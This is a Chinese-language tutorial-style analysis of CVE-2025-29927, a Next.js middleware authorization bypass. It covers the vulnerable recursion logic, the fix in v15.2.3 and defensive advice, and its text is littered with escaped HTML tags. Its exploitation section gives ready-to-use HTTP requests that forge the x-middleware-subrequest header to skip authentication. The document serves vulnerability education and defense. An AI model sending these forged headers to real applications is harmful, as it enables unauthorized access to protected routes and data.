Next.js中间件权限绕过漏洞分析（CVE-2025-29927）教学文档<\/h1>

一、漏洞概述<\/h2>
CVE-2025-29927是Next.js框架中存在的一个高危中间件逻辑绕过漏洞，允许攻击者通过构造特定HTTP请求头，绕过中间件的安全控制逻辑（如身份验证、路径重写、CSP防护等）。该漏洞CVSS评分9.1（Critical），可导致未授权访问、数据泄露及拒绝服务攻击。<\/p>

二、漏洞背景<\/h2>

Next.js中间件功能<\/h3>

Next.js中间件（Middleware）允许开发者在请求到达目标路由前执行代码，典型应用场景包括：<\/p>

身份验证：检查用户会话Cookie，拦截未授权请求<\/li>
路径重写：动态修改请求路径（如多语言路由\/en\/home → \/home）<\/li>

安全头设置：添加CSP、CORS等安全响应头<\/li> <\/ul>

中间件的安全性直接决定了应用的核心防护能力。若中间件逻辑被绕过，攻击者可直接访问后端业务逻辑。<\/p>

三、漏洞机制分析<\/h2>

漏洞核心原理<\/h3>

递归请求处理机制<\/strong>：<\/p>

用户请求在middleware中会请求身份验证接口<\/li>
请求身份验证接口也会经过middleware<\/li>
Next.js通过x-middleware-subrequest<\/code>头标识内部递归请求<\/li> <\/ul> <\/li>
递归限制机制<\/strong>：<\/p> 每次递归请求都会向x-middleware-subrequest<\/code>头添加一次middleware标识<\/li> 如果递归请求达到五次，就会返回带有'x-middleware-next': '1'<\/code>的响应<\/li> 该响应表示忽略中间件的所有逻辑（包括鉴权检查）<\/li> <\/ul> <\/li> <\/ol> 关键代码分析<\/h3> const<\/span> subreq<\/span> =<\/span> params<\/span>.request<\/span>.headers<\/span>[`x-middleware-subrequest`<\/span>] <\/span><\/span>const<\/span> subrequests<\/span> =<\/span> subreq<\/span>.split<\/span>(':'<\/span>) :<\/span> [] <\/span><\/span>const<\/span> MAX_RECURSION_DEPTH<\/span> =<\/span> 5<\/span> <\/span><\/span>const<\/span> depth<\/span> =<\/span> subrequests<\/span>.reduce<\/span>( <\/span><\/span> (acc<\/span>, curr<\/span>) => (curr<\/span> ===<\/span> params<\/span>.name<\/span> ?<\/span> acc<\/span> +<\/span> 1<\/span> :<\/span> acc<\/span>), <\/span><\/span> 0<\/span>) <\/span><\/span>if<\/span> (depth<\/span> >=<\/span> MAX_RECURSION_DEPTH<\/span>) { <\/span><\/span> return<\/span> { <\/span><\/span> response<\/span>:<\/span> new<\/span> runtime<\/span>.context<\/span>.Response<\/span>(null<\/span>, { <\/span><\/span> headers<\/span>:<\/span> {'x-middleware-next'<\/span>:<\/span> '1'<\/span>,}, <\/span><\/span> }), <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞成因<\/h3> 路径暴露<\/strong>：<\/p> 中间件的逻辑路径（middlewareInfo.name）可被攻击者推测<\/li> 路径信息存储在.next\/server\/middleware-build-manifest.json<\/code>文件中<\/li> <\/ul> <\/li> 校验宽松<\/strong>：<\/p> 未对外部请求的x-middleware-subrequest<\/code>头进行过滤<\/li> 允许伪造内部请求标识<\/li> <\/ul> <\/li> <\/ol> 四、漏洞利用<\/h2> Payload构造方法<\/h3> 确定中间件路径标识<\/strong>：<\/p> 中间件在根目录middleware.ts<\/code> → 标识为middleware<\/code><\/li> 中间件在src<\/code>目录src\/middleware.ts<\/code> → 标识为src\/middleware<\/code><\/li> <\/ul> <\/li> 构造恶意请求头<\/strong>：<\/p> <\/li> <\/ol> 对于根目录middleware：<\/p> GET<\/span> \/dashboard HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> localdomain:3000<\/span> <\/span><\/span>x-middleware-subrequest:<\/span> middleware:middleware:middleware:middleware:middleware<\/span> <\/span><\/span><\/code><\/pre>对于src目录middleware：<\/p> GET<\/span> \/dashboard HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> localdomain:3000<\/span> <\/span><\/span>x-middleware-subrequest:<\/span> src\/middleware:src\/middleware:src\/middleware:src\/middleware:src\/middleware<\/span> <\/span><\/span><\/code><\/pre>五、漏洞复现<\/h2> 搭建漏洞环境：参考lem0n817\/CVE-2025-29927<\/a><\/li> 使用上述Payload构造请求<\/li> 观察是否绕过中间件权限控制<\/li> <\/ol> 六、漏洞修复<\/h2> 修复方案<\/h3> Next.js在v15.2.3版本中修复了该漏洞，关键修复点：<\/p> 动态令牌验证<\/strong>：<\/p> 引入x-middleware-subrequest-id<\/code>头进行验证<\/li> 使用加密符号存储（Symbol.for）严格区分内外请求<\/li> <\/ul> <\/li> 请求头过滤<\/strong>：<\/p> 非法伪造的x-middleware-subrequest<\/code>头会被自动删除<\/li> 确保中间件安全逻辑不被绕过<\/li> <\/ul> <\/li> <\/ol> 修复代码对比<\/h3> 参考：Comparing v15.2.2...v15.2.3 · vercel\/next.js<\/a><\/p> 七、防御建议<\/h2> 升级Next.js<\/strong>：立即升级到v15.2.3或更高版本<\/li> 中间件设计<\/strong>：避免在中间件中进行复杂的递归调用<\/li> 对关键路径添加额外的权限验证<\/li> <\/ul> <\/li> 请求头验证<\/strong>：严格验证所有传入的请求头<\/li> 特别是x-middleware-*<\/code>系列头部<\/li> <\/ul> <\/li> <\/ol> 八、参考资源<\/h2> 代码审计-知识星球<\/a><\/li> Next.js 和损坏的中间件：授权工件 - zhero_web_security<\/a><\/li> CVE 2025 29927 Nextjs Auth Bypass - chestnut's blog<\/a><\/li> <\/ol> 九、总结<\/h2> CVE-2025-29927是一个严重的Next.js中间件绕过漏洞，攻击者可通过构造特定的HTTP请求头完全绕过中间件的安全控制。开发人员应及时升级框架版本，并审查现有中间件实现的安全性。<\/p>